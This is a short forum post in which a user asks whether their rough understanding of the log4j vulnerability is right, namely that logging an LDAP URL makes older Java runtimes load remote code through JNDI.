‽
Join Date: May 2004
Location: near Bremen, Germany
|
Somewhat confused by the explanations. My understanding is: Java provides JNDI for lookup purposes, and this also used to support LDAP. log4j, in turn, supports loading code at runtime (for plug-in purposes, I presume). Someone figured out that if they trick your log4j code to log an LDAP URL, that in turn coerces (old unpatched versions of) the Java runtime into trying to load that code?
Something in there isn't quite right, is it?
|